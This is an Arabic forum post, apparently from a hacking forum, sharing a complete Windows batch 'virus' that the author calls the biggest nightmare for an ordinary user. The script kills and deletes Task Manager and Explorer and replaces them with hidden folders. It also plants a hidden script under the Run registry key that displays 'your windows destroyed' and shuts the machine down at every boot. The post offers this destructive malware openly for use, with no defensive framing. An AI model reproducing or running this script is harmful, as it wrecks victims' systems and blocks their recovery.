- إنضم
- 6 مارس 2015
- المشاركات
- 1,117
- مستوى التفاعل
- 1,533
- النقاط
- 1,220
غير متصل
من فضلك قم بتحديث الصفحة لمشاهدة المحتوى المخفي
السلام عليكم ورحمة الله وبركاته
اليوم فيروس بسيط لكن هو عبارة عن اكبر كابوس ممكن يصيب المستعمل البسيط
اخليكم مع الاوامر المستعملة
تقييم على الفيروس من ناحية الخطورة
اليوم فيروس بسيط لكن هو عبارة عن اكبر كابوس ممكن يصيب المستعمل البسيط
اخليكم مع الاوامر المستعملة
كود:
@echo off
taskkill /f /im taskmgr.exe
attrib -s -h "%SystemRoot%\taskmgr.exe"
del /f /q "%SystemRoot%\taskmgr.exe"
md "%SystemRoot%\taskmgr.exe"
attrib +s +h "%SystemRoot%\taskmgr.exe"
taskkill /f /im explorer.exe
attrib -s -h "%SystemRoot%\explorer.exe"
del /f /q "%SystemRoot%\explorer.exe"
md "%SystemRoot%\explorer.exe"
attrib +s +h "%SystemRoot%\explorer.exe"
cls
echo @echo off>dz.cmd
echo msg * your windows destroyed by dz/virus-man\>>dz.cmd
echo shutdown -s -t 02>>dz.cmd
cls
md "%HOMEDRIVE%\systemfiles"
copy dz.cmd "%HOMEDRIVE%\systemfiles\1.cmd"
attrib +s +h +r +a "%HOMEDRIVE%\systemfiles"
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v sys /d "%HOMEDRIVE%\systemfiles\1.cmd"
cls
msg * your windows destroyed by dz/virus-man\
shutdown -s -t 02
تقييم على الفيروس من ناحية الخطورة

